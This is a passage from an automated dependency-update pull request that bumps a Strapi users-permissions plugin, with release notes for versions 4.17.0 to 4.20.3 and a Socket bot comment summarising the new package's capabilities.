- \[dependencies] chore: bump @strapi/design-systems from 1.14.1 to 1.15.0 ([#19630](https://github.com/strapi/strapi/pull/19630)) @madhurisandbhor

### [`v4.20.3`](https://togithub.com/strapi/strapi/releases/tag/v4.20.3)

[Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.2...v4.20.3)

##### Bug fix

- \[core:data-transfer] fix: transfer pull getting stuck/skipping assets step
[https://github.com/strapi/strapi/pull/19485](https://togithub.com/strapi/strapi/pull/19485)5) [@​Bassel17](https://togithub.com/Bassel17) - \[core:upload] Add sizeInBytes for upload providers [https://github.com/strapi/strapi/pull/19593](https://togithub.com/strapi/strapi/pull/19593)3) [@​giu1io](https://togithub.com/giu1io) - \[plugin:i18n] fix: do not validate locale if not creating [https://github.com/strapi/strapi/pull/19626](https://togithub.com/strapi/strapi/pull/19626)6) [@​Marc-Roig](https://togithub.com/Marc-Roig) ##### ๐Ÿ“š Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) ๐Ÿ“š ### [`v4.20.2`](https://togithub.com/strapi/strapi/releases/tag/v4.20.2) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.1...v4.20.2) ##### ๐Ÿ”ฅ Bug fix - \[core:content-manager] fix(content-manager): fix strange behaviours when you change position on Dynamic Zones and solve issue with ids not unique [https://github.com/strapi/strapi/pull/19480](https://togithub.com/strapi/strapi/pull/19480)0) [@​simotae14](https://togithub.com/simotae14) ##### ๐Ÿ“š Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) ๐Ÿ“š ### [`v4.20.1`](https://togithub.com/strapi/strapi/releases/tag/v4.20.1) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.0...v4.20.1) ##### ๐Ÿ’… Enhancement - \[core:admin] enhancement: allow relative links in the Blocks editor [https://github.com/strapi/strapi/pull/19197](https://togithub.com/strapi/strapi/pull/19197)7) [@​Ben-Zahler](https://togithub.com/Ben-Zahler) 
##### ๐Ÿ”ฅ Bug fix - \[core:content-releases] fix(content-releases): replace Popover with Menu component in the Details page [https://github.com/strapi/strapi/pull/19408](https://togithub.com/strapi/strapi/pull/19408)8) [@​simotae14](https://togithub.com/simotae14) - \[core:content-type-builder] fix: restrict model and attribute names that break Strapi [https://github.com/strapi/strapi/pull/19345](https://togithub.com/strapi/strapi/pull/19345)5) [@​innerdvations](https://togithub.com/innerdvations) - \[core:strapi] Fix input payload validation [https://github.com/strapi/strapi/pull/19467](https://togithub.com/strapi/strapi/pull/19467)7) [@​Convly](https://togithub.com/Convly) - \[plugin:i18n] fix(i18n): extract relatedEntityId from the query [https://github.com/strapi/strapi/pull/19510](https://togithub.com/strapi/strapi/pull/19510)0) [@​jhoward1994](https://togithub.com/jhoward1994) - \[typescript] Fix Type Generation Checks for Min/Max Default Values [https://github.com/strapi/strapi/pull/19490](https://togithub.com/strapi/strapi/pull/19490)0) [@​Convly](https://togithub.com/Convly) ##### โš™๏ธ Chore - \[core:admin] fix(admin): french translations for null/not null filters [https://github.com/strapi/strapi/pull/19384](https://togithub.com/strapi/strapi/pull/19384)4) [@​t-fritsch](https://togithub.com/t-fritsch) - \[core:content-releases] test(content-releases): add end-to-end tests [https://github.com/strapi/strapi/pull/19407](https://togithub.com/strapi/strapi/pull/19407)7) [@​markkaylor](https://togithub.com/markkaylor) - \[docs] Experiment/readme strapi v5 [https://github.com/strapi/strapi/pull/19503](https://togithub.com/strapi/strapi/pull/19503)3) [@​Mcastres](https://togithub.com/Mcastres) - \[plugin:cloud] Experiment/change label cloud plugin [https://github.com/strapi/strapi/pull/19483](https://togithub.com/strapi/strapi/pull/19483)3) [@​Mcastres](https://togithub.com/Mcastres) ##### ๐Ÿ“– Documentation - \[core:content-releases] docs(content-releases): 
add frontend docs [https://github.com/strapi/strapi/pull/19391](https://togithub.com/strapi/strapi/pull/19391)1) [@​simotae14](https://togithub.com/simotae14) ##### ๐Ÿš€ New feature - \[core:content-releases] feat(content-releases): added a purchase content releases page [https://github.com/strapi/strapi/pull/19455](https://togithub.com/strapi/strapi/pull/19455)5) [@​simotae14](https://togithub.com/simotae14) ##### ๐Ÿ“š Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) ๐Ÿ“š ### [`v4.20.0`](https://togithub.com/strapi/strapi/releases/tag/v4.20.0) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.19.1...v4.20.0) ##### ๐Ÿ”ฅ Bug fix - \[core:admin] fix(users): adjust response management to create user [https://github.com/strapi/strapi/pull/19382](https://togithub.com/strapi/strapi/pull/19382)2) [@​davidpv1](https://togithub.com/davidpv1) - \[core:content-manager] fix(cm): pass params to post requests for publish & unpublish [https://github.com/strapi/strapi/pull/19294](https://togithub.com/strapi/strapi/pull/19294)4) [@​joshuaellis](https://togithub.com/joshuaellis) - \[core:content-releases] fix(content-releases): handle release.createdBy is null [https://github.com/strapi/strapi/pull/19376](https://togithub.com/strapi/strapi/pull/19376)6) [@​markkaylor](https://togithub.com/markkaylor) - \[core:content-releases] fix(content-releases): wrong value for the max number of pending releases limit [https://github.com/strapi/strapi/pull/19394](https://togithub.com/strapi/strapi/pull/19394)4) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): standardize icons size [https://github.com/strapi/strapi/pull/19399](https://togithub.com/strapi/strapi/pull/19399)9) 
[@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): add disabled state to action radio buttons [https://github.com/strapi/strapi/pull/19420](https://togithub.com/strapi/strapi/pull/19420)0) [@​simotae14](https://togithub.com/simotae14) - \[core:data-transfer] fix(dts): support morphToOne relations [https://github.com/strapi/strapi/pull/19381](https://togithub.com/strapi/strapi/pull/19381)1) [@​markkaylor](https://togithub.com/markkaylor) - \[core:database] fix: nested on commit on rollback transactions [https://github.com/strapi/strapi/pull/19368](https://togithub.com/strapi/strapi/pull/19368)8) [@​Marc-Roig](https://togithub.com/Marc-Roig) ##### ๐Ÿ’… Enhancement - \[core:content-releases] fix(content-releases): Add single type to releases [https://github.com/strapi/strapi/pull/19332](https://togithub.com/strapi/strapi/pull/19332)2) [@​Feranchz](https://togithub.com/Feranchz) ##### ๐Ÿ“š Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) ๐Ÿ“š ### [`v4.19.1`](https://togithub.com/strapi/strapi/releases/tag/v4.19.1) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.19.0...v4.19.1) ##### ๐Ÿ”ฅ Bug fix - \[core:admin] Fix password is sent when it was not changed [https://github.com/strapi/strapi/pull/19295](https://togithub.com/strapi/strapi/pull/19295)5) [@​xyrolle](https://togithub.com/xyrolle) - \[core:content-manager] Sanitize relation read query [https://github.com/strapi/strapi/pull/19227](https://togithub.com/strapi/strapi/pull/19227)7) [@​Bassel17](https://togithub.com/Bassel17) - \[core:content-type-builder] Check component against collectionTypeNames [https://github.com/strapi/strapi/pull/19328](https://togithub.com/strapi/strapi/pull/19328)8) 
[@​Bassel17](https://togithub.com/Bassel17) - \[plugin:i18n] fix(i18n): locale swapping with content-types & D\&P disabled[https://github.com/strapi/strapi/pull/19296](https://togithub.com/strapi/strapi/pull/19296)96) [@​joshuaellis](https://togithub.com/joshuaellis) ##### ๐Ÿ’… Enhancement - \[core:content-manager] feat(content-manager): better handle entry duplication [https://github.com/strapi/strapi/pull/19256](https://togithub.com/strapi/strapi/pull/19256)6) [@​remidej](https://togithub.com/remidej) ##### โš™๏ธ Chore - \[tooling] chore(workflows): update unit_front skipped test to use node 20 [https://github.com/strapi/strapi/pull/19363](https://togithub.com/strapi/strapi/pull/19363)3) [@​Feranchz](https://togithub.com/Feranchz) ##### ๐Ÿ“š Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) ๐Ÿ“š ### [`v4.19.0`](https://togithub.com/strapi/strapi/releases/tag/v4.19.0) [Compare Source](https://togithub.com/strapi/strapi/compare/e1ede8c55a0e1e22ce20137bf238fc374bd5dd51...v4.19.0) ##### ๐Ÿš€ New feature - **Content Releases** :tada: [@​markkaylor](https://togithub.com/markkaylor) [@​Feranchz](https://togithub.com/Feranchz) [@​simotae14](https://togithub.com/simotae14) - \[core:admin] feat: add vite [https://github.com/strapi/strapi/pull/18697](https://togithub.com/strapi/strapi/pull/18697)7) [@​joshuaellis](https://togithub.com/joshuaellis) - \[core:strapi] feat(strapi): add experimental plugin:watch:link command to CLI [https://github.com/strapi/strapi/pull/19143](https://togithub.com/strapi/strapi/pull/19143)3) [@​joshuaellis](https://togithub.com/joshuaellis) ##### ๐Ÿ’… Enhancement - \[tooling] ci(perf): update yarn-nm-install action 
[https://github.com/strapi/strapi/pull/18747](https://togithub.com/strapi/strapi/pull/18747)7) [@​belgattitude](https://togithub.com/belgattitude) ##### โš™๏ธ Chore - \[core:admin] chore(admin): data-transfer should be dev dep & peer dep loose [https://github.com/strapi/strapi/pull/19192](https://togithub.com/strapi/strapi/pull/19192)2) [@​joshuaellis](https://togithub.com/joshuaellis) - \[core:content-type-builder] chore(ctb): remove "new" badge on Blocks attribute [https://github.com/strapi/strapi/pull/19246](https://togithub.com/strapi/strapi/pull/19246)6) [@​remidej](https://togithub.com/remidej) - \[core:data-transfer] chore: improve logging for assets restore error [https://github.com/strapi/strapi/pull/19251](https://togithub.com/strapi/strapi/pull/19251)1) [@​innerdvations](https://togithub.com/innerdvations) - \[generators:app] feat: Automatically Create 'plugins.js/ts' in Config on New Strapi Project Initialization [https://github.com/strapi/strapi/pull/19025](https://togithub.com/strapi/strapi/pull/19025)5) [@​L-Weisz](https://togithub.com/L-Weisz) ##### ๐Ÿ”ฅ Bug fix - \[core:data-transfer] fix(data-transfer): Skip and warn on orphan links in import and transfer [https://github.com/strapi/strapi/pull/19186](https://togithub.com/strapi/strapi/pull/19186)6) [@​christiancp100](https://togithub.com/christiancp100) - \[typescript] Respect autogenerate setting for JS projects [https://github.com/strapi/strapi/pull/19207](https://togithub.com/strapi/strapi/pull/19207)7) [@​innerdvations](https://togithub.com/innerdvations) - \[typescript] Fix Types Generation for Biginteger Attributes With Default Values [https://github.com/strapi/strapi/pull/19241](https://togithub.com/strapi/strapi/pull/19241)1) [@​Convly](https://togithub.com/Convly) ##### ๐Ÿ“š Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found 
[here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) ๐Ÿ“š ### [`v4.18.0`](https://togithub.com/strapi/strapi/compare/v4.17.1...e1ede8c55a0e1e22ce20137bf238fc374bd5dd51) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.17.1...e1ede8c55a0e1e22ce20137bf238fc374bd5dd51) ### [`v4.17.1`](https://togithub.com/strapi/strapi/releases/tag/v4.17.1) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.17.0...v4.17.1) ##### What's Changed - fix(cm): manage when we're creating entries derivatively in the CM by [@​joshuaellis](https://togithub.com/joshuaellis) in [https://github.com/strapi/strapi/pull/19209](https://togithub.com/strapi/strapi/pull/19209) **Full Changelog**: https://github.com/strapi/strapi/compare/v4.17.0...v4.17.1 ##### ๐Ÿ“š Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) ๐Ÿ“š ### [`v4.17.0`](https://togithub.com/strapi/strapi/releases/tag/v4.17.0) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.16.2...v4.17.0) ##### ๐Ÿ”ฅ Bug fix - \[core:content-releases] fix(content-releases): fix padding bottom duplicated in the Heading of the Details page [https://github.com/strapi/strapi/pull/19066](https://togithub.com/strapi/strapi/pull/19066)6) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): remove Refresh button from the details page [https://github.com/strapi/strapi/pull/19067](https://togithub.com/strapi/strapi/pull/19067)7) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): redirect to the list page when we have errors in the Details page [https://github.com/strapi/strapi/pull/19078](https://togithub.com/strapi/strapi/pull/19078)8) 
[@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): add a bottom border below tabs [https://github.com/strapi/strapi/pull/19090](https://togithub.com/strapi/strapi/pull/19090)0) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): empty Details page add a button to the CM [https://github.com/strapi/strapi/pull/19095](https://togithub.com/strapi/strapi/pull/19095)5) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): CM add Release add content when there are no releases [https://github.com/strapi/strapi/pull/19096](https://togithub.com/strapi/strapi/pull/19096)6) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases):disable edit and delete buttons in the Details page when you don't have permissions [https://github.com/strapi/strapi/pull/19099](https://togithub.com/strapi/strapi/pull/19099)9) [@​simotae14](https://togithub.com/simotae14) - \[core:helper-plugin] fix(helper-plugin): memoize GenericInput for performance issues [https://github.com/strapi/strapi/pull/19177](https://togithub.com/strapi/strapi/pull/19177)7) [@​joshuaellis](https://togithub.com/joshuaellis) - \[core:strapi] Filter out undefined controllers in startup telemetry checks [https://github.com/strapi/strapi/pull/19144](https://togithub.com/strapi/strapi/pull/19144)4) [@​Convly](https://togithub.com/Convly) - \[plugin:graphql] fix: revert graphql-upload library to non breaking change version [https://github.com/strapi/strapi/pull/19182](https://togithub.com/strapi/strapi/pull/19182)2) [@​Bassel17](https://togithub.com/Bassel17) - \[typescript] \[Types] Fix entity-service's parameters inference for generic mapped types with deep literal intersections[https://github.com/strapi/strapi/pull/19093](https://togithub.com/strapi/strapi/pull/19093)93) [@​Convly](https://togithub.com/Convly) ##### ๐Ÿš€ New feature - \[core:content-releases] 
feat(content-releases): delete release action on release page [https://github.com/strapi/strapi/pull/19089](https://togithub.com/strapi/strapi/pull/19089)9) [@​markkaylor](https://togithub.com/markkaylor) - \[core:content-releases] feat(content-releases): group release actions by property [https://github.com/strapi/strapi/pull/19097](https://togithub.com/strapi/strapi/pull/19097)7) [@​markkaylor](https://togithub.com/markkaylor) ##### โš™๏ธ Chore - \[dependencies] chore: update ds 1.14.1 [https://github.com/strapi/strapi/pull/19179](https://togithub.com/strapi/strapi/pull/19179)9) [@​joshuaellis](https://togithub.com/joshuaellis) ##### ๐Ÿ“š Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) ๐Ÿ“š *** ##### What's Changed > Due to typescript migrations not every PR had a milestone, this it the complete list of PRs from 4.16.2 -> 4.17.0 - chore(plugins/i18n): migrate to basic ts by [@​alexandrebodin](https://togithub.com/alexandrebodin) in [https://github.com/strapi/strapi/pull/18735](https://togithub.com/strapi/strapi/pull/18735) - Convert CM to TS by [@​jhoward1994](https://togithub.com/jhoward1994) in [https://github.com/strapi/strapi/pull/18669](https://togithub.com/strapi/strapi/pull/18669) - chore(blocks): refactor useBlocksStore by [@​remidej](https://togithub.com/remidej) in [https://github.com/strapi/strapi/pull/18776](https://togithub.com/strapi/strapi/pull/18776) - chore(actions): run checks workflow on develop branches by [@​joshuaellis](https://togithub.com/joshuaellis) in [https://github.com/strapi/strapi/pull/18815](https://togithub.com/strapi/strapi/pull/

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR has been generated by Mend Renovate. View repository job log here.

socket-security[bot] commented 3 weeks ago

New and removed dependencies detected. Learn more about Socket for GitHub ↗︎

| Package | New capabilities | Transitives | Size | Publisher |
| --- | --- | --- | --- | --- |
| npm/@strapi/plugin-users-permissions@4.24.2 | Transitive: environment, eval, network | +70 | 16 MB | marc-roig-strapi |

🚮 Removed packages: npm/@strapi/plugin-users-permissions@4.15.5

View full report ↗︎